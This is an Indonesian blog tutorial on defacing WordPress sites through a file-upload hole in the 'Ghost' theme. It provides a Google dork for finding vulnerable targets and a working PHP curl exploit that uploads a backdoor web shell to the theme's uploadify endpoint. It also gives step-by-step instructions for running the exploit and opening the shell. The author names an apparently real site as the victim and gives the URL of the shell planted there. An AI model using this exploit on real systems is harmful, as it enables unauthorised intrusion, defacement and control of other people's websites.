kali ini saya akan share tutorial Deface dengan Teknik Wordpress Ghost Theme File Upload ,
Exploit Aslinya Disini http://1337day.com/exploit/21416
Cara deface kali ini membutuhkan bantuan XAMPP
Download XAMPP : DISINI
Google Dork : inurl:wp-content/themes/Ghost/
Jika Sudah terinstall kamu buka PHP.ini , cek di System C > xammp > php > php.ini
Lalu tekan CTRL+F lalu ketikkan curl lalu hapus tanda titik dua koma ( ; )
Sekarang Copy Exploitnya
Lalu yourFile.php diganti dengan nama shell backdoor kalian yang sudah di masukan ke dalam folder xampp>php<?php
$uploadfile
=
"yourFile.php"
;
$ch
= curl_init(
"http://{target}/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php"
);
curl_setopt(
$ch
, CURLOPT_POST, true);
curl_setopt(
$ch
, CURLOPT_POSTFIELDS,
array
(
'Filedata'
=>
"@$uploadfile"
));
curl_setopt(
$ch
, CURLOPT_RETURNTRANSFER, 1);
$postResult
= curl_exec(
$ch
);
curl_close(
$ch
);
"$postResult"
;
?>
Disini nama shell saya 007.php
dan juga masukin target nya dengan mencari mengunakan dork yang tadi
disini saya mendapat target http://www.hibra.com.ar/
sekarang kita hanya perlu menambahkan
/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php
Dan akan menjadi seperti ini http://www.hibra.com.ar/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php
Dan bila ada tulisan {"status":"NOK", "ERR":"This file is incorect"}
itu biasa nya VULN
setelah itu simpan...disini saya simpan dengan nama x.php
sekarang kita buka CMD
buka exploit tersebut mengunakan CMD
karna saya simpan dengan nama x.php jadi untuk membuka nya php x.php
Bila muncul seperti ini berarti berhasil
Untuk shell Acces berada disini http://site.com/wp-content/uploads/settingsimages/namashell.php
Karna nama shell saya 007 jadi membuka shell nya http://www.hibra.com.ar/wp-content/uploads/settingsimages/007.php
semoga bermanfaat :D
0 komentar:
Posting Komentar